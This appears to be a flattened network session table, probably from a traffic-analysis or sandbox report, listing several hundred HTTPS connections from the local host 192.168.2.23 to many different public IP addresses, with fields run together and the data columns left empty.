                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19968192.168.2.2347820119.13.221.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19969192.168.2.2359236201.252.72.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19970192.168.2.2335534133.141.192.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19971192.168.2.2335924165.45.104.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19972192.168.2.234656463.186.222.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19973192.168.2.2356400117.52.67.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19974192.168.2.2360950183.220.255.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19975192.168.2.23348581.109.55.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19976192.168.2.233499485.223.247.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19977192.168.2.234691818.43.33.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19978192.168.2.235155681.48.218.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19979192.168.2.23467164.83.157.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19980192.168.2.234733619.36.147.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19981192.168.2.2353272148.171.175.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19982192.168.2.23354864.167.18.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19983192.168.2.2355336182.95.209.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19984192.168.2.233665282.122.24.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19985192.168.2.234093690.173.132.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19986192.168.2.233540477.59.158.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19987192.168.2.234354669.112.70.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19988192.168.2.2345150182.141.254.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19989192.168.2.2351376210.41.240.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19990192.168.2.2345530143.106.206.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19991192.168.2.235369427.112.227.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19992192.168.2.234493845.2.186.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19993192.168.2.23392369.126.133.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19994192.168.2.233870886.111.229.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19995192.168.2.2340688146.65.21.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19996192.168.2.2336348216.198.113.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19997192.168.2.2344258190.86.88.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19998192.168.2.2333948121.73.41.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19999192.168.2.234430035.227.218.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20000192.168.2.2349446111.253.237.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20001192.168.2.235383439.233.135.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20002192.168.2.235259276.94.33.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20003192.168.2.2343010147.187.169.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20004192.168.2.2341374194.232.18.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20005192.168.2.234664872.152.210.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20006192.168.2.2336028166.172.93.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20007192.168.2.2336774121.176.178.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20008192.168.2.2351512161.48.218.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20009192.168.2.235021689.99.29.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20010192.168.2.2338362213.85.96.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20011192.168.2.2341492218.204.252.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20012192.168.2.2338474154.40.166.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20013192.168.2.233567271.187.168.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20014192.168.2.233974614.157.69.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20015192.168.2.2339938156.69.154.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20016192.168.2.235388876.34.194.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20017192.168.2.233333854.224.45.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20018192.168.2.2358422206.149.167.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20019192.168.2.233852466.139.85.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20020192.168.2.2345518222.59.58.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20021192.168.2.2333404133.163.149.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20022192.168.2.2360648125.151.10.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20023192.168.2.2354754113.128.231.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20024192.168.2.2359422118.84.150.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20025192.168.2.2349556197.40.96.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20026192.168.2.235715253.86.132.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20027192.168.2.2334770189.236.244.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20028192.168.2.2355960198.164.193.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20029192.168.2.234437678.3.187.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20030192.168.2.2356778168.35.87.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20031192.168.2.2342728188.10.109.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20032192.168.2.2350798187.219.45.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20033192.168.2.233969639.143.167.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20034192.168.2.2350262104.235.226.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20035192.168.2.2347676107.172.147.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20036192.168.2.233872467.15.46.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20037192.168.2.2334570131.46.118.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20038192.168.2.234592876.69.6.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20039192.168.2.233368473.228.181.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20040192.168.2.2348690107.221.99.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20041192.168.2.234855436.118.31.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20042192.168.2.234490876.84.91.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20043192.168.2.235342259.196.171.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20044192.168.2.2357938150.211.157.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20045192.168.2.2357822155.66.150.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20046192.168.2.233876250.90.144.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20047192.168.2.233650076.31.17.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20048192.168.2.2338282169.184.164.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20049192.168.2.235225058.248.200.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20050192.168.2.235801049.221.81.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20051192.168.2.2349492173.221.147.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20052192.168.2.2339654120.214.27.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20053192.168.2.2345034156.117.138.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20054192.168.2.235416281.53.51.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20055192.168.2.2352204188.64.100.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20056192.168.2.2351628158.87.157.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20057192.168.2.2347112154.53.39.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20058192.168.2.2351948175.25.126.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20059192.168.2.2346254137.220.138.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20060192.168.2.2339600136.101.220.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20061192.168.2.235894449.79.165.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20062192.168.2.2355706181.215.216.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20063192.168.2.234070291.40.41.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20064192.168.2.235173050.171.94.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20065192.168.2.2342282145.135.205.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20066192.168.2.235250678.240.176.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20067192.168.2.2358378138.124.230.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20068192.168.2.2347202162.148.177.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20069192.168.2.2352208156.223.44.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20070192.168.2.2347812176.37.49.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20071192.168.2.234722467.74.46.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20072192.168.2.23421242.114.66.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20073192.168.2.2342430122.94.173.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20074192.168.2.2343556203.3.241.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20075192.168.2.234354253.178.152.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20076192.168.2.2340480117.94.213.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20077192.168.2.233829839.21.197.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20078192.168.2.2336084170.60.21.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20079192.168.2.2351150138.241.49.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20080192.168.2.2334354183.12.80.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20081192.168.2.2335316133.93.233.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20082192.168.2.2338280195.31.58.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20083192.168.2.234747031.93.240.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20084192.168.2.2360202107.219.133.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20085192.168.2.2343340193.12.238.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20086192.168.2.236002838.38.61.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20087192.168.2.2352598179.133.165.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20088192.168.2.2333874148.97.80.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20089192.168.2.2349222119.242.57.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20090192.168.2.2340522150.61.217.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20091192.168.2.2355572183.188.137.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20092192.168.2.2342662172.195.58.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20093192.168.2.2335160192.48.86.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20094192.168.2.2350742101.207.145.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20095192.168.2.235629291.202.68.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20096192.168.2.2349710211.250.29.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20097192.168.2.234983067.37.136.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20098192.168.2.235595266.151.22.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20099192.168.2.233762088.251.28.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20100192.168.2.2359718208.146.19.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20101192.168.2.2349696192.121.79.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20102192.168.2.2355474133.217.10.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20103192.168.2.234699667.207.41.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20104192.168.2.2337644196.173.130.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20105192.168.2.2355034159.129.82.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20106192.168.2.2336792100.193.178.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20107192.168.2.23353289.166.113.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20108192.168.2.234326413.198.65.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20109192.168.2.2344594142.198.3.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20110192.168.2.2360918155.9.11.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20111192.168.2.2343358165.215.86.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20112192.168.2.234417220.69.4.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20113192.168.2.234317650.69.104.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20114192.168.2.235806418.5.180.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20115192.168.2.2348568102.75.199.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20116192.168.2.2341306141.214.197.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20117192.168.2.2336824153.32.239.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20118192.168.2.2334894113.163.248.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20119192.168.2.234658087.97.192.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20120192.168.2.2360628151.2.124.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20121192.168.2.2348368180.13.8.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20122192.168.2.2360740135.6.107.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20123192.168.2.234432639.191.137.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20124192.168.2.2333158125.233.96.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20125192.168.2.2348194190.20.37.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20126192.168.2.234427273.100.6.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20127192.168.2.235134271.162.188.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20128192.168.2.235740486.39.236.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20129192.168.2.2348226217.122.218.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20130192.168.2.2354874117.159.87.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20131192.168.2.2353494194.40.222.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20132192.168.2.2347850105.162.131.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20133192.168.2.2336078216.193.170.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20134192.168.2.234119625.92.124.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20135192.168.2.2356128162.91.229.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20136192.168.2.2349194145.183.57.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20137192.168.2.235718459.109.67.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20138192.168.2.234895496.184.31.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20139192.168.2.233673695.36.23.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20140192.168.2.2334012216.204.20.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20141192.168.2.2347486181.246.218.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20142192.168.2.2351932131.183.109.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20143192.168.2.2354468154.118.204.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20144192.168.2.235129664.152.250.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20145192.168.2.2351078141.103.52.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20146192.168.2.233768642.36.132.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20147192.168.2.23420721.201.66.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20148192.168.2.2353370132.181.118.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20149192.168.2.233968890.42.245.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20150192.168.2.234992280.13.23.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20151192.168.2.2349976144.225.114.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20152192.168.2.235263478.1.221.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20153192.168.2.234497672.215.160.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20154192.168.2.2346014156.141.221.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20155192.168.2.2333822161.253.68.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20156192.168.2.234024080.101.220.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20157192.168.2.235349863.146.172.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20158192.168.2.234955654.193.175.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20159192.168.2.2340680128.217.93.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20160192.168.2.235222238.249.154.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20161192.168.2.234581494.6.76.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20162192.168.2.2357048130.99.122.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20163192.168.2.235144893.207.66.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20164192.168.2.2359476198.229.130.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20165192.168.2.235491699.114.122.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20166192.168.2.233422643.17.126.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20167192.168.2.2359156221.147.244.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20168192.168.2.2341572182.64.239.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20169192.168.2.2343074187.170.135.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20170192.168.2.2338082221.154.156.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20171192.168.2.2342966146.9.39.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20172192.168.2.2339962185.73.67.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20173192.168.2.2357594173.42.144.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20174192.168.2.2355318121.210.180.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20175192.168.2.2353534196.32.251.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20176192.168.2.233541437.33.61.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20177192.168.2.2353922125.247.96.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20178192.168.2.2343062160.64.22.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20179192.168.2.2354718128.129.8.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20180192.168.2.2349954108.226.155.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20181192.168.2.235648880.150.6.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20182192.168.2.2353676125.243.233.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20183192.168.2.233954614.107.238.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20184192.168.2.2352090208.139.250.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20185192.168.2.2341144146.245.216.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20186192.168.2.233677846.74.26.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20187192.168.2.2334666213.89.65.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20188192.168.2.234941461.89.125.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
